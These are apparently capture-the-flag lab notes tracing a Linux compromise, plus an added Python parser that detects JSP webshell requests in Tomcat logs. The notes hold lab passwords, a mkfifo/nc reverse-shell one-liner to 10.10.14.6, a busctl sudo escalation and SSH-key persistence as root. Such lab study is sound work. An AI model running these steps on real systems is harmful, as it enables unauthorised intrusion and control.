Assessment

  • Notes

    Sudo version 1.8.31
    Ubuntu 20.04.1 LTS (Focal Fossa)
    

  • htb-student

    • read history
    • find flag1 in the hidden directories
    • read barry history
    • su barry
      • i_l0ve_s3cur1ty!
  • barry
    • flag in ~
    • part of adm group
    • reading /var/log
      • something like cmd/cmd.jsp?cmd=cat+flag3.txt
    • we can find flag3.txt in /var/log itself (DIDN'T FIND ORIGINALLY)
    • looking for tomcat
      • /etc/tomcat9
      • /var/lib/tomcat9
    • found tomcatadm password in tomcat-users.xml.bak
      • T0mc@t_s3cret_p@ss!
    • log in to the application on port 8080
    • upload reverse shell on manager
    • reverse shell as tomcat + flag4 in folder
  • tomcat
    • sudo -l
      • sudo /usr/bin/busctl
      • GTFOBins exploit not working
    • opened another nc listener (nc2)
    • ran on nc1 - f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.6 8844 >/tmp/f
    • received shell on nc2
    • made it stable using python3 -c 'import pty;pty.spawn("/bin/bash")'
      • did it 2-3 times
    • ran the GTFOBins busctl exploit to get root
    • moved to the root directory to get flag5.txt
    • ssh-keygen in .ssh
    • added id_rsa.pub to authorized_keys
    • copied id_rsa to kali using http.server
    • chmod 600 id_rsa
    • ssh -i id_rsa root@ip.ad.dr.rs
  • root
    • back to reading /var/log
      • found something like cmd/cmd.jsp?cmd=cat+flag3.txt
    • grep -r "LLPE" .
    • flag3.txt was present in the same folder
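
The /var/log finding above (cmd/cmd.jsp?cmd=cat+flag3.txt) seen from the defender's side, as an added example that is not part of the original notes: a parser that flags access-log requests passing a command-style parameter to a JSP page. The log lines are constructed; Tomcat's common access-log pattern and the parameter-name list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed log layout: Tomcat AccessLogValve "common" pattern, %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Assumed list of parameter names used by JSP command shells; extend for your estate.
SUSPECT_PARAMS = {"cmd", "command", "exec"}

def find_webshell_requests(lines):
    """Return one finding per request that passes a command parameter to a JSP page."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log entry (stack trace, blank line, ...)
        url = urlsplit(m["target"])
        if not url.path.lower().endswith((".jsp", ".jspx")):
            continue
        # parse_qsl decodes both '+' and %XX, so "cat+flag3.txt" -> "cat flag3.txt"
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() in SUSPECT_PARAMS:
                findings.append({
                    "host": m["host"],
                    "time": m["time"],
                    "path": url.path,
                    "command": value,
                    # 200 means the page existed and answered; 404 is only a probe
                    "served": m["status"] == "200",
                })
    return findings

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2020:05:35:11 +0000] "GET /manager/html HTTP/1.1" 200 18233',
    '192.0.2.10 - - [01/Sep/2020:05:38:02 +0000] "GET /cmd/cmd.jsp?cmd=cat+flag3.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Sep/2020:05:38:40 +0000] "GET /cmd/cmd.jsp?CMD=cat%20flag3.txt HTTP/1.1" 404 0',
    '192.0.2.77 - - [01/Sep/2020:05:40:00 +0000] "GET /docs/index.jsp?lang=en HTTP/1.1" 200 1200',
    'SEVERE: this line is not an access-log entry',
]

if __name__ == "__main__":
    for f in find_webshell_requests(SAMPLE_LOG):
        print(f)
```

A finding with "served" set means a command page answered from the webapps tree, so the next check is how it was deployed (manager uploads, credentials left in backup files such as tomcat-users.xml.bak).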